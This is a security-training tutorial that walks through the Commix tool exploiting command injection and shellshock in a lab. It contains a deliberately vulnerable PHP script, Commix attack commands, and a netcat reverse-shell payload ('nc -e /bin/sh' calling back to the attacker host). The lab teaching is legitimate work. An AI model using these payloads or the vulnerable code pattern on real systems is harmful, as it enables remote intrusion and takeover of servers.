Commix – an automated tool for command injection
Commix, short for [comm]and [i]njection e[x]politer, is a tool for finding and exploiting command injection vulnerabilities in a given parameter. This article explains some of the major features of this tool by taking some vulnerable applications as targets. Usage of this tool is well documented for those with some basic knowledge of command injection exploitation.
Setting up Commix
Download Commix by cloning the Git repository:
What should you learn next?
git clone [download]
I have downloaded and installed it in Kali Linux, where we will run all our demos in this article.
I found the usage of this tool very simple. To get help we can type the following command.
python Commix.py –h
Command injection
This section shows the usage and various options available with Commix. I wrote some scripts and took one target application from exploit-db.com for demonstrating different scenarios.
Example 1: Simple php command injection
Let's start with a simple PHP command injection vulnerability to get started with the tool. The following is the script I have hosted in my target server.
<?php
$cmd=$_GET['cmd'];
echo system($cmd);
?>
This is accessible from the attacking machine using the following URL:
http://10.1.1.8/cmdinj/vulnerable.php?cmd=[some command]
Let's see Commix in action:
Run the following command to start with basic command injection.
python Commix.py --url="http://10.1.1.8/cmdinj/vulnerable.php?cmd=INJECT_HERE"
Notice that I have replaced the value of the parameter "cmd" with "INJECT_HERE". This is how Commix understands the target parameter to be tested. Now, Commix starts performing tests on this parameter and gives us an interactive shell as shown below.
The shell obtained in this example is not stable to execute some commands. You can observe the output of "id" command.
This is working fine when tried from a browser.
There are multiple ways in Commix to get around this. I just used Commix's –os-cmd option to get an nc reverse shell from the target machine.
Listen for incoming connections on port 4444 as shown below.
Now, type in the following command with Commix.
python Commix.py --url="http://10.1.1.8/cmdinj/vulnerable.php?cmd=INJECT_HERE" --os-cmd="nc -e /bin/sh 10.1.1.9 4444"
Now, let's look at the Netcat shell. We should be greeted with a new interactive shell where we can run the commands.
Note: If Netcat is not installed on the target machine, which is often the case; we can use other techniques such Python/Perl reverse shell.
Example 2: PHP file manager 0.9.8 from www.exploit-db.com
The next example is to show another feature of Commix that can be leveraged to exploit command injection.
The vulnerable application can be downloaded from the link below.
https://www.exploit-db.com/exploits/37709/
Let us understand the application and find the command injection vulnerability manually.
Host the downloaded application in a server and run it from the browser.
Click "Enter" button and you should be landed in the following page.
The command injection vulnerability resides in "Execute Command" functionality of this page. When we click this button, it asks for a command to enter.
Enter an Operating System command as shown above and you should see the following link which is vulnerable to Command Injection.
Now, let's see how we can use Commix tool to identify and exploit the above application.
Type in the following command.
python Commix.py –url="http://10.1.1.8/phpfilemanager/index.php?action=6¤t_dir=/var/www/phpfilemanager/&cmd=INJECT_HERE"
The above step has failed for some reason. After exploring a while, I found that the target application is sending cookies to the server after clicking the button "Enter".
Our injection attempt with Commix failed, as cookies were not provided. Commix has support for cookies as well. We can provide cookies using "—cookies" option. Let us intercept the request and provide cookies to Commix. This is shown below.
This time, our attempt was successful and we got a shell as shown below.
Example 3: shellshock exploitation made easier
Personally, I liked the shellshock exploitation feature of Commix. If you are new to shellshock, please refer to the following articles written by me earlier.
/practical-shellshock-exploitation-part-1/
/practical-shellshock-exploitation-part-2/
These articles show the internals of shellshock, and how we can set up our own lab to practice shellshock exploitation. Commix tool makes it easier to exploit Shellshock vulnerability. I am using the same setup that I used in the above-mentioned articles to demonstrate Commix's shellshock exploitation feature.
Below is the target URL.
http://10.1.1.8/cgi-bin/vulnerable.sh
Run the following command with "--shellshock" option to exploit the target.
python Commix.py --url="http://10.1.1.8/cgi-bin/vulnerable.sh" --shellshock
What should you learn next?
As we can see in the above figure, we have a shell on the box.
Enroll in an Ethical Hacking Boot Camp and earn two of the industry’s most respected certifications — guaranteed.
- CEH exam voucher
- PenTest+ exam voucher
- Exam Pass Guarantee
- Live online hacking training
In this Series
- Commix – an automated tool for command injection
- The rise of ethical hacking: Protecting businesses in 2024
- How to crack a password: Demo and video walkthrough
- Inside Equifax's massive breach: Demo of the exploit
- Wi-Fi password hack: WPA and WPA2 examples and video walkthrough
- How to hack mobile communications via Unisoc baseband vulnerability
- How to build a hook syscall detector
- Top tools for password-spraying attacks in active directory networks
- NPK: Free tool to crack password hashes with AWS
- Tutorial: How to exfiltrate or execute files in compromised machines with DNS
- Top 19 tools for hardware hacking with Kali Linux
- 20 popular wireless hacking tools [updated 2021]
- 13 popular wireless hacking tools [updated 2021]
- Man-in-the-middle attack: Real-life example and video walkthrough [Updated 2021]
- Decrypting SSL/TLS traffic with Wireshark [updated 2021]
- Dumping a complete database using SQL injection [updated 2021]
- Hacking clients with WPAD (web proxy auto-discovery) protocol [updated 2021]
- Hacking communities in the deep web [updated 2021]
- How to hack Android devices using the StageFright vulnerability [updated 2021]
- Hashcat tutorial for beginners [updated 2021]
- How to hack a phone charger
- What is a side-channel attack?
- Copy-paste compromises
- Hacking Microsoft teams vulnerabilities: A step-by-step guide
- PDF file format: Basic structure [updated 2020]
- 10 most popular password cracking tools [updated 2020]
- Popular tools for brute-force attacks [updated for 2020]
- Top 7 cybersecurity books for ethical hackers in 2020
- How quickly can hackers find exposed data online? Faster than you think …
- Hacking the Tor network: Follow up [updated 2020]
- Podcast/webinar recap: What's new in ethical hacking?
- Ethical hacking: TCP/IP for hackers
- Ethical hacking: SNMP recon
- How hackers check to see if your website is hackable
- Ethical hacking: Stealthy network recon techniques
- Getting started in Red Teaming
- Ethical hacking: IoT hacking tools
- Ethical hacking: BYOD vulnerabilities
- Ethical hacking: Wireless hacking with Kismet
- Ethical hacking: How to hack a web server
- Ethical hacking: Top 6 techniques for attacking two-factor authentication
- Ethical hacking: Port interrogation tools and techniques
- Ethical hacking: Top 10 browser extensions for hacking
- Ethical hacking: Social engineering basics
- Ethical hacking: Breaking windows passwords
- Ethical hacking: Basic malware analysis tools
- Ethical hacking: How to crack long passwords
- Ethical hacking: Passive information gathering with Maltego
- Ethical hacking: Log tampering 101
- Ethical hacking: What is vulnerability identification?
- Ethical hacking: Breaking cryptography (for hackers)
Get certified and advance your career
- Exam Pass Guarantee
- Live instruction
- CompTIA, ISACA, (ISC)², Cisco, Microsoft and more!
